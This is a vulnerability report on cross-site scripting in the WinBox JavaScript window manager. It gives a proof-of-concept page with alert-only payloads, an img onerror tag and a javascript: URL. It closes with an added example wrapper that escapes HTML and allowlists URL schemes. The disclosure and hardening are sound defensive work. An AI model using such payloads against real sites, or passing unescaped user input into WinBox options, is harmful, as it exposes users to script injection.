winbox

vulnerability cross-site scripting (xss) - generic (cwe-79)
severity 8.8
language javascript
registry other

✍️ Description

Winbox is a modern window manager for the web: lightweight, outstanding performance, no dependencies, fully customizable, open source!

Winbox lets you create a window with custom HTML in it using:

new WinBox({
    title: "Set innerHTML",
    html: "<h1>Lorem Ipsum</h1>"
});

If the HTML content is user-controlled, a malicious user could create a window with malicious HTML content, leading to XSS:

new WinBox({
    title: "Set innerHTML",
    html: "<img src='zer0h' onerror=alert(2)>" // XSS
});

Another parameter is also vulnerable to XSS. You can create a window and open a URL inside that window using:

new WinBox("WinBox.js", {
    url: "https://nextapps-de.github.io/winbox/"
});

It's possible to set a URL like the following: javascript:alert(1);

🕵️‍♂️ Proof of Concept

<head>
    <script src="https://rawcdn.githack.com/nextapps-de/winbox/0.1.8/dist/winbox.bundle.js">
    </script>
</head>
<body>
<script>
new WinBox("WinBox.js", {
    url: "javascript:alert('URL')"
});
new WinBox({
    title: "Set innerHTML",
    html: "<img src='zer0h' onerror=alert('HTML')>"
});
</script>
</body>

💥 Impact

Unintended XSS. You should emphasize in your documentation not to use user input to build your windows, as this can lead to XSS.
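
For applications that must show user-supplied data in a window, the following is an added example (not part of this report or of WinBox) of an application-side wrapper that escapes text before it reaches the html option and allowlists the scheme of the url option. The names escapeHtml, safeUrl and buildWindowOptions are hypothetical helpers, and only the two options discussed above are handled.

```javascript
// Added example: application-side hardening, not WinBox's own code.
// Only absolute http(s) URLs may be opened inside a window.
const ALLOWED_URL_SCHEMES = new Set(["http:", "https:"]);

// Escape HTML-significant characters so untrusted text passed through the
// `html` option is displayed as text instead of being parsed as markup.
function escapeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (c) => map[c]);
}

// Return the normalized URL when its scheme is allowlisted, otherwise null.
// Parsing with the URL API (rather than a string-prefix check) handles
// mixed case, leading spaces and embedded tabs the same way a browser does.
function safeUrl(candidate) {
  let parsed;
  try {
    parsed = new URL(String(candidate));
  } catch {
    return null; // relative or malformed input is rejected
  }
  return ALLOWED_URL_SCHEMES.has(parsed.protocol) ? parsed.href : null;
}

// Build the options object for `new WinBox(title, options)` from untrusted
// input. `text` and `url` are the hypothetical untrusted fields.
function buildWindowOptions({ text, url } = {}) {
  const options = {};
  if (text !== undefined) {
    options.html = escapeHtml(text);
  }
  if (url !== undefined) {
    const checked = safeUrl(url);
    if (checked === null) {
      throw new Error("rejected window URL: scheme not allowed");
    }
    options.url = checked;
  }
  return options;
}

// Browser usage (constructed input):
//   new WinBox("Comment", buildWindowOptions({ text: userComment }));
//   new WinBox("Preview", buildWindowOptions({ url: userLink }));
```

With this wrapper, both payloads from the proof of concept are neutralized: the img tag is rendered as literal text and the javascript: URL is rejected before WinBox sees it.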